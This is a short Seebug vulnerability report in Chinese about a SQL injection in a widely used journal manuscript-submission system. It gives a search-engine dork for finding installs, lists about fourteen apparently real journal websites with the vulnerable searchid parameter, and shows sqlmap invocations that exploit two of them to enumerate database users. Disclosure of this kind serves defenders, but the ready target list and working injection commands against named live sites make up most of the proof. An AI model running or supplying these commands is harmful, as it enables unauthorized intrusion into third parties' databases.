某通用稿件系统一处通用SQL注入

2015-06-01T00:00:00
ID SSV:95734
Type seebug
Reporter Root
Modified 2015-06-01T00:00:00

Description

简要描述:

影响海量投稿系统

详细说明:

google关键字:技术支持:南京杰诺瀚软件科技有限公司

<img src="https://images.seebug.org/upload/201506/01155501f569a5b7d13b0ac97f5ebb2a3e943c65.jpg" alt="111953561956921ba4560988b7209ee16ffd7e63.jpg" width="600" onerror="javascript:errimg(this);">

案例: http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768 http://www.lcmzxzz.com/Web/News.aspx?searchid=586073 http://gaojian.xhnj.com/Web/News.aspx?searchid=313670 http://xb.cuit.edu.cn/Web/News.aspx?searchid=112266 http://dxjykx.cnmanu.cn/Web/News.aspx?searchid=107094 http://www.jsnyxb.com/Web/News.aspx?searchid=1 http://www.lcsjwk.com/Web/News.aspx?searchid=1 http://j.chinatransducers.com/Web/News.aspx?searchid=1 http://www.linpi.net/Web/News.aspx?searchid=1 http://www.mfskin.net/Web/News.aspx?searchid=1 http://www.gjmzyfs.com/Web/News.aspx?searchid=1 http://ctc.hlglzz.com/Web/News.aspx?searchid=328935 http://www.lcjsyx.com/Web/News.aspx?searchid=84777 http://www.apsjournal.com/web/News.aspx?searchid=111061

漏洞证明:

http://www.lcsjwk.com/Web/News.aspx?searchid=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

<img src="https://images.seebug.org/upload/201506/01161130ea96e9907d0c81e1317cd82be39d405b.jpg" alt="QQ图片20150601161010.jpg" width="600" onerror="javascript:errimg(this);">

http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

<img src="https://images.seebug.org/upload/201506/01161408c3941d2d0c92e7c3ce38901d099cfb65.jpg" alt="QQ图片20150601161245.jpg" width="600" onerror="javascript:errimg(this);">